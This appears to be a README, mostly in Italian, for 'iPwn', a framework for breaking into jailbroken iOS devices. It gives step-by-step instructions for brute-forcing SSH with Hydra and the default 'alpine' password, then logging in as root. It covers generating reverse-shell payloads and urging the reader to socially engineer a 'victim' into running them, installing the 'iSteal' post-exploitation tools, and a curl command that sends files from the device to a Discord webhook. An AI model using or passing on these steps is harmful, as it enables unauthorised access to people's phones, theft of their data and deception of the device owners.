
Un Framework progettato per lo sfruttamento di dispositivi iOS.
Un framework pensato per lo sfruttamento di dispositivi iOS.

<!> RICORDA: L'IPHONE CHE STAI TENTANDO DI ACCEDERE CON QUESTO STRUMENTO DEVE ESSERE JAILBROKEN <!>
Questo progetto è ancora in fase di sviluppo. Sto aggiungendo ulteriori estensioni e opzioni per il post-exploitation per raccogliere informazioni sul dispositivo e altre cose. Sto anche lavorando a un modo per inserire un payload in un normale tweak iOS in modo che ottenere una reverse shell sia più semplice.
[6/2/21] - Aggiunto un menu extra per le persone che hanno i propri dispositivi collegati al computer e vogliono armeggiarci. Presto verranno aggiunte altre cose.
[6/2/21] - Aggiunti 4 moduli extra per lo strumento di post-exploitation 'iSteal'. Aggiunta anche un'opzione per installare il jailbreak checkra1n.
[5/25/21] - Aggiunti 8 moduli extra per lo strumento di post-exploitation 'iSteal'.
[5/25/21] - Aggiunti 2 moduli extra per lo strumento di post-exploitation 'iSteal'.
iPwn è un framework pensato per sfruttare e ottenere l'accesso a dispositivi iOS. Ha anche un'estensione che è un mini-framework chiamato 'iSteal' destinato al post-exploitation (dopo aver ottenuto l'accesso al dispositivo). Questa descrizione ti guiderà attraverso i diversi modi e passaggi per ottenere l'accesso a un dispositivo iOS e raccogliere informazioni da esso.
Il primo modo per ottenere l'accesso a un dispositivo iOS. - SSH-Bruteforcing.
La maggior parte dei dispositivi iOS jailbroken con Cydia vengono forniti con OpenSSH preinstallato. E di solito, le credenziali sono molto deboli o comuni, una delle password più comuni sarà inclusa in una wordlist che dovrebbe essere nella tua cartella se hai scaricato iPwn dal mio Github.
Quindi iniziamo! Per prima cosa, eseguiamo lo script.
python main.py
Poi, scriveremo il comando 'brute'. (Se vuoi digitare help e familiarizzare con i comandi, puoi farlo.)

Una volta digitato il comando 'brute'. Digita 'help' per visualizzare tutti i comandi disponibili.
Ora, useremo il comando 'default' per avviare SSH-Bruteforcing con una wordlist contenente le password più comuni.
Ti verrà chiesto di inserire l'indirizzo IP del target, assicurati di inserire quello corretto e valido, premi invio, poi passa al passaggio successivo.

<!> SE STAI OTTENENDO ERRORI, ASSICURATI CHE HYDRA SIA INSTALLATO, PUOI INSTALLARE HYDRA CON I COMANDI SOTTO <!>
commands to install hydra:
sudo apt install hydra
sudo pacman -S hydra
Tornando al tutorial, se hai hydra installato sul tuo PC, dovrebbe già tentare di fare bruteforce. Aspetta circa 20-40 secondi e se il dispositivo utilizza le credenziali predefinite/comuni fornite nella wordlist, Hydra dovrebbe darti un messaggio che mostra la password corretta.

Come possiamo vedere, la password corretta è 'alpine'. Ora possiamo accedere al telefono eseguendo 'ssh root@ip_goes_here' su un'altra finestra di terminale. Quando ti chiede la password, inserisci la password che hai ottenuto da Hydra.

Ora siamo loggati!

A questo punto probabilmente vogliamo raccogliere alcune informazioni sul telefono e controllarlo, ma questo verrà dopo. Perché prima, dobbiamo installare alcune cose molto importanti. Se vuoi usare SCP per trasferire il file di setup che automatizza tutto, puoi farlo. Il file si trova in /post-exploitation/post.sh. Una volta trasferito il file 'post.sh' sul dispositivo iOS, eseguilo con 'bash post.sh' e dovrebbe iniziare a installare e configurare gli strumenti di post-exploitation che useremo.
<!> NOTA: I COMANDI SOTTO SONO SOLO PER LE PERSONE CHE VOGLIONO INSTALLARE I PACCHETTI E GLI STRUMENTI NECESSARI MANUALMENTE <!>
run all these commands to setup/install everything thats needed:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
Ok, ora che abbiamo tutto installato, possiamo andare nella cartella 'iSteal' ed eseguire lo script di post-exploitation 'iSteal'.
python3 post.py
<!> NOTA: Assicurati quando provi a eseguire file python, di usarli con "python3" invece di "python" o "py" <!>
Quindi ora lo script dovrebbe essere caricato, se vuoi usare il comando 'help' e dare un'occhiata, puoi farlo.

Ora, useremo il comando 'list' per mostrare i moduli/opzioni disponibili per il post-exploitation.

<!> Tieni PRESENTE: CI SARANNO MOLTI AGGIORNAMENTI SULLO SCRIPT DI POST-EXPLOITATION, E VERRANNO AGGIUNTI ALTRI MODULI, QUINDI QUESTA IMMAGINE VERRÀ AGGIORNATA PER MANTENERE L'ACCURATEZZA <!>
Per usare un modulo, basta fare 'use specific/module'. Esempio: use modules/list_installed_default_apps
E come puoi vedere, quando eseguiamo quel modulo, mostra le applicazioni predefinite installate sul dispositivo iOS del target.

Il secondo modo per ottenere l'accesso a un dispositivo iOS. - Reverse shell.
Ora, ti mostrerò come farlo nel secondo modo, che è un po' più avanzato. Tieni presente, non includerò immagini per questa parte.
run the iPwn framework by doing 'python main.py'
type in the 'payload' command
wait for the payload factory to load.
select a payload of your choice, Example: use payloads/factory/reverse_bash
enter your IP
enter your Port
then you should get a message that says 'payload generated'
type in the 'back' command to go back to the main menu
type in the 'listen' command to start listening for incoming connections
make sure that your victim runs the script via terminal or throught their own way, try social engineering, be creative!
once the script is executed on the victims iOS device, you should get a connection
install the important packages via transferring the 'post.sh' located in /post-exploitation and executing it, or manually do it yourself.
you can now run the 'iSteal' or 'AutoEnum' post-exploitation tools
have fun! :)
<!> Se stai eseguendo il passo 2 e ti blocchi sulla parte in cui devi installare i pacchetti/strumenti importanti, vai al passo 1 e copia la guida per l'installazione dei pacchetti/strumenti! <!>
Ci sono molti modi per trasferire file al dispositivo iOS e anche molti modi per scaricarli. Il modo più semplice per estrarre e scaricare file dal dispositivo iOS è usare Curl e un webhook di Discord.
<!> NOTA: Il segmento sotto dimostrerà come estrarre e scaricare file dal dispositivo iOS usando curl <!>
Step 1: Create a discord server
Step 2: Create a webhook and copy the link
Step 3: On the iOS device, navigate towards the directory that contains the file you want to retrieve.
Step 4: enter the command below (replace file_here.txt with the name of your file, replace webhook_url_here with your webhook url)
curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here
Step 5: wait around 10-50 seconds
Done! The file should now be uploaded to your discord server. You can now download/view the file.
Windows 10 - Stabile
Garuda Linux - Stabile
Arch based distros - Stabile
Dispositivi supportati [L'estensione di post-exploitation dovrebbe funzionare per tutti questi]
-----------------
iPod più recenti del 4a generazione
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12
I miei dispositivi testati [Quelli che ho testato personalmente]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4a generazione
